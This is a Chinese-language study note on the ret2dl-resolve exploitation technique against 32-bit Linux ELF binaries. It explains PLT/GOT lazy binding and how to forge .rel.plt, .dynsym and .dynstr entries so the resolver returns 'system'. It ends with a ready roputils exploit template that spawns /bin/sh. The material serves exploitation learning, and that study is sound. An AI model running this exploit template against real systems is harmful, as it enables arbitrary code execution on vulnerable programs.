之前在drop看过一篇文章,是西电的Bigtang师傅写的,这里来学习一下姿势做一些笔记。
0x01 基础知识
Linux ELF文件存在两个很重要的表,一个是got表(.got.plt)一个是plt表(.plt)。这些存在的原因是ELF文件使用了延迟绑定的技术。当我们调用一个函数时,如果这是第一次调用,会动用plt中的寻找函数找出这个函数的虚拟地址,然后写入到got表中,之后第二次第三次调用就不需要再查找,直接把got表中的内容取出使用就可以了。
为了实现这种设计的功能,plt代码中是这样写的
1 0x8048340 <free@plt>: jmp DWORD PTR ds:0x804a00c 2 0x8048346 <free@plt+6>: push 0x0 3 0x804834b <free@plt+11>: jmp 0x8048330 4 5 0x8048350 <malloc@plt>: jmp DWORD PTR ds:0x804a010 6 0x8048356 <malloc@plt+6>: push 0x8 7 0x804835b <malloc@plt+11>: jmp 0x8048330 8 9 0x8048360 <puts@plt>: jmp DWORD PTR ds:0x804a014 10 0x8048366 <puts@plt+6>: push 0x10 11 0x8048366 <puts@plt+11>: jmp 0x8048330
0x804a00c、0x804a010、0x804a014是free、malloc、puts对应的got表地址。plt代码首先会取出got表中的值,然后做一个跳转,如果是第一次调用函数,那么got表中的值是指向plt第二句的,比如0x804a00c的值就是0x8048346。
plt的第二句会压入序号,因为free是got表中第一项,所以是push 0x0。而malloc是表中第二项,所以是push 0x8。之后跳入0x8048330。
0x8048330处的代码如下所示
0x8048330: push DWORD PTR ds:0x804a004 0x8048336: jmp DWORD PTR ds:0x804a008
0x804a000是got表的起始地址。+8处保存着查找函数,这里跳转到查找函数。
ELF文件的节区如下所示(使用readelf -S ./tst)
vb@unun:~/桌面/double free$ readelf -S ./tst 共有 31 个节头,从偏移量 0x1844 开始: 节头: [Nr] Name Type Addr Off Size ES Flg Lk Inf Al [ 0] NULL 00000000 000000 000000 00 0 0 0 [ 1] .interp PROGBITS 08048154 000154 000013 00 A 0 0 1 [ 2] .note.ABI-tag NOTE 08048168 000168 000020 00 A 0 0 4 [ 3] .note.gnu.build-i NOTE 08048188 000188 000024 00 A 0 0 4 [ 4] .gnu.hash GNU_HASH 080481ac 0001ac 000020 04 A 5 0 4 [ 5] .dynsym DYNSYM 080481cc 0001cc 000070 10 A 6 1 4 [ 6] .dynstr STRTAB 0804823c 00023c 00006a 00 A 0 0 1 [ 7] .gnu.version VERSYM 080482a6 0002a6 00000e 02 A 5 0 2 [ 8] .gnu.version_r VERNEED 080482b4 0002b4 000030 00 A 6 1 4 [ 9] .rel.dyn REL 080482e4 0002e4 000008 08 A 5 0 4 [10] .rel.plt REL 080482ec 0002ec 000020 08 AI 5 24 4 [11] .init PROGBITS 0804830c 00030c 000023 00 AX 0 0 4 [12] .plt PROGBITS 08048330 000330 000050 04 AX 0 0 16 [13] .plt.got PROGBITS 08048380 000380 000008 00 AX 0 0 8 [14] .text PROGBITS 08048390 000390 0001e2 00 AX 0 0 16 [15] .fini PROGBITS 08048574 000574 000014 00 AX 0 0 4 [16] .rodata PROGBITS 08048588 000588 000011 00 A 0 0 4 [17] .eh_frame_hdr PROGBITS 0804859c 00059c 00002c 00 A 0 0 4 [18] .eh_frame PROGBITS 080485c8 0005c8 0000cc 00 A 0 0 4 [19] .init_array INIT_ARRAY 08049f08 000f08 000004 00 WA 0 0 4 [20] .fini_array FINI_ARRAY 08049f0c 000f0c 000004 00 WA 0 0 4 [21] .jcr PROGBITS 08049f10 000f10 000004 00 WA 0 0 4 [22] .dynamic DYNAMIC 08049f14 000f14 0000e8 08 WA 6 0 4 [23] .got PROGBITS 08049ffc 000ffc 000004 04 WA 0 0 4 [24] .got.plt PROGBITS 0804a000 001000 00001c 04 WA 0 0 4 [25] .data PROGBITS 0804a01c 00101c 000008 00 WA 0 0 4 [26] .bss NOBITS 0804a040 001024 000084 00 WA 0 0 32 [27] .comment PROGBITS 00000000 001024 000034 01 MS 0 0 1 [28] .shstrtab STRTAB 00000000 001739 00010a 00 0 0 1 [29] .symtab SYMTAB 00000000 001058 000480 10 30 47 4 [30] .strtab STRTAB 00000000 0014d8 000261 00 0 0 1 Key to Flags: W (write), A (alloc), X (execute), M (merge), S (strings) I (info), L (link order), G (group), T (TLS), E (exclude), x (unknown) O (extra OS processing required) o (OS specific), p (processor specific)
0x02 如何利用
查找函数的查找过程
index_arg(push xx)——>.rel.plt(Elf32_Rel)——>.dynsym(Elf32_Sym)——>.dynstr(st_name)
事实上,虚拟地址是通过最后一个箭头,即从st_name得来的,只要我们能够修改这个st_name就可以执行任意函数。比如把st_name的内容修改成为"system"。
而index_arg是我们控制的,我们需要做的是通过一系列操作。把index_arg可控转化为st_name可控。
那么我们要实现控制就要解决一下的几个问题:
1.怎么计算index_arg才能控制.rel.plt(Elf32_Rel)值?
index_arg是我们直接通过压栈参数进行控制的,使用要伪造的目标地址减去.rel.plt段基地址就是index_arg的值。其中.rel.plt段使用IDA是不能看到的,所以这里要使用objdump -s -j .rel.plt ./tst命令来查看。
vb@unun:~/桌面$ objdump -s -j .rel.plt ./tst ./tst: 文件格式 elf32-i386 Contents of section .rel.plt: 80482ec 0ca00408 07010000 10a00408 07020000 ................ 80482fc 14a00408 07030000 18a00408 07050000 ................
由于我的目标地址处于bss段上的0x804A06,所以就需要进行如下的运算:
0x804A060-0x80482ec=7540,那么我们的index_arg的值就应该是7540,以指向.rel.plt
域
2.怎么构造.rel.plt(Elf32_Rel)才能控制.dynsym(Elf32_Sym)值?
当.rel.plt(Elf32_Rel)域落到可控区域之后要考虑的就是如何构造这个的值。
使用readelf -r命令可以看到这些reloc项,其中处于.rel.plt的用于函数重定位也正是我们的目标。
vb@unun:~/桌面$ readelf -r tst 重定位节 '.rel.dyn' 位于偏移量 0x2e4 含有 1 个条目: 偏移量 信息 类型 符号值 符号名称 08049ffc 00000406 R_386_GLOB_DAT 00000000 __gmon_start__ 重定位节 '.rel.plt' 位于偏移量 0x2ec 含有 4 个条目: 偏移量 信息 类型 符号值 符号名称 0804a00c 00000107 R_386_JUMP_SLOT 00000000 gets@GLIBC_2.0 0804a010 00000207 R_386_JUMP_SLOT 00000000 __stack_chk_fail@GLIBC_2.4 0804a014 00000307 R_386_JUMP_SLOT 00000000 puts@GLIBC_2.0 0804a018 00000507 R_386_JUMP_SLOT 00000000 __libc_start_main@GLIBC_2.0
可以看出.rel.plt中的值满足如下Elf32_Rel结构
typedef struct { Elf32_Addr r_offset; // 这个值就是got表的虚拟地址 Elf32_Word r_info; // .dynsym节区符号表索引(下标为r_info>>8) } Elf32_Rel;
其中第一项是对应的got表的地址。第二项经过>>8运算后是.dynsym节区的索引下标值,我们要控制的就是这一项。
r_info的计算方法是
1.n=(欲伪造的地址-.dynsym基地址)/0x10
2.r_info=n<<8
dynsym基地址使用objdump -s -j .dynsym ./tst来获取。
3.怎么构造.dynsym(Elf32_Sym)才能实现控制.dynstr(st_name)值?
typedef struct { Elf32_Word st_name; /* Symbol name (string tbl index) 这个就是*/ Elf32_Addr st_value; /* Symbol value */ Elf32_Word st_size; /* Symbol size */ unsigned char st_info; /* Symbol type and binding */ unsigned char st_other; /* Symbol visibility under glibc>=2.2 */ Elf32_Section st_shndx; /* Section index */ } Elf32_Sym;
.dynsym节区包含了动态链接符号表,符号表由Elf32_Sym结构表示。具体情况如上所示。其中第一项就是其对应的st_name到.dynstr节起始的偏移值。我们要把偏移值指向我们的可控区域,就能实现控制st_name
.dynstr的基地址由objdump -s -j .dynstr ./tst来获得。
3. .dynstr写入system完成利用
.dynstr节包含了动态链接的字符,字符串是直接以ASCII码的形式储存的。所以在指针指向的地方直接写入ASCII形式的system即可达成利用!
0x03 现成的脚本模版
来自Github
from roputils import * fpath = sys.argv[1] offset = int(sys.argv[2]) rop = ROP(fpath) addr_bss = rop.section('.bss') buf = rop.retfill(offset) buf += rop.call('read', 0, addr_bss, 100) buf += rop.dl_resolve_call(addr_bss+20, addr_bss) p = Proc(rop.fpath) p.write(p32(len(buf)) + buf) print "[+] read: %r" % p.read(len(buf)) buf = rop.string('/bin/sh') buf += rop.fill(20, buf) buf += rop.dl_resolve_data(addr_bss+20, 'system') buf += rop.fill(100, buf) p.write(buf) p.interact(0)